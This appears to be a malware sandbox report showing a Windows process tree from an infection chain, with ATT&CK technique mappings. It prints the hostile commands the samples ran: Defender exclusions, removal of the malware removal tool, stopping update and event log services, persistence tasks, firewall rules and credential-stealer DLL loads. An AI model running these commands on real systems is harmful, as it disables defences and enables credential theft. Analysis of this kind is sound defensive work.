"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:2584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:2212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5260 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:4392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1868,i,5845572995340213799,12204783848993598240,131072 /prefetch:8
5⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\1000056001\83495a94e8.exe
"C:\Users\Admin\AppData\Local\Temp\1000056001\83495a94e8.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:60

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2856

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
3⤵
- Loads dropped DLL
PID:4544

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5084

C:\Windows\system32\netsh.exe
netsh wlan show profiles
5⤵
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\968772205171_Desktop.zip' -CompressionLevel Optimal
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Users\Admin\AppData\Local\Temp\1000059001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000059001\amert.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:5288

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5936

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3412

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5580

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2212

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5412

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 828
3⤵
- Program crash
PID:5848

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2156

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:6108

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:6964

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4432

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
2⤵
- Executes dropped EXE
PID:5356

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
3⤵
- Creates scheduled task(s)
PID:1628

C:\Users\Admin\AppData\Local\Temp\1000211001\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\1000211001\ISetup8.exe"
3⤵
- Executes dropped EXE
PID:6016

C:\Users\Admin\AppData\Local\Temp\u4n4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4n4.0.exe"
4⤵
- Executes dropped EXE
PID:236

C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1448

C:\Users\Admin\AppData\Local\Temp\Uninstallcheck_alpha\ptInst.exe
C:\Users\Admin\AppData\Local\Temp\Uninstallcheck_alpha\ptInst.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5872

C:\Users\Admin\AppData\Roaming\Uninstallcheck_alpha\ptInst.exe
C:\Users\Admin\AppData\Roaming\Uninstallcheck_alpha\ptInst.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\u4n4.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4n4.1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3872

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\1000212001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000212001\toolspub1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 496
4⤵
- Program crash
PID:5560

C:\Users\Admin\AppData\Local\Temp\1000213001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000213001\4767d2e713f2021e8fe856e3ea638b58.exe"
3⤵
- Executes dropped EXE
PID:4224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\1000213001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000213001\4767d2e713f2021e8fe856e3ea638b58.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3820

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:4736

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:6308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5284

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:6016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7012

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1452

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:4672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2608

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:640

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1308

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:2596

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:2664

C:\Users\Admin\AppData\Local\Temp\1000214001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000214001\FirstZ.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5148

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
PID:5232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:6280

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:2380

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
4⤵
- Launches sc.exe
PID:6308

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1044

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
4⤵
- Launches sc.exe
PID:5036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
4⤵
- Launches sc.exe
PID:2980

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
4⤵
- Launches sc.exe
PID:5896

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:6600

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:6620

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:7032

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:7036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
4⤵
- Launches sc.exe
PID:7028

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
4⤵
- Launches sc.exe
PID:5080

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:6852

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
4⤵
- Launches sc.exe
PID:6856

C:\Users\Admin\AppData\Local\Temp\1000215001\Uni400uni.exe
"C:\Users\Admin\AppData\Local\Temp\1000215001\Uni400uni.exe"
3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:3084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000215001\Uni400uni.exe" -Force
4⤵
PID:5380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
4⤵
PID:3968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
4⤵
PID:3176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
4⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\1000217001\AppGate2103v01_16.exe
"C:\Users\Admin\AppData\Local\Temp\1000217001\AppGate2103v01_16.exe"
3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5836

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1468

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2028

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
2⤵
- Loads dropped DLL
PID:5448

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2304

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:6028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\968772205171_Desktop.zip' -CompressionLevel Optimal
4⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5864

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5100

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4232

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6496

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3476

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:6132

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:5404

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:6260

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:6964

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:7036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:6900

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:6064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5244

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:6120

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:6108

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:6188

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2228

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:7044

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7008

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
- Executes dropped EXE
PID:7124

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6256

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6516

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
- Executes dropped EXE
PID:3068

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6964

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
1⤵
- Executes dropped EXE
PID:6868

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

Virtualization/Sandbox Evasion

System Information Discovery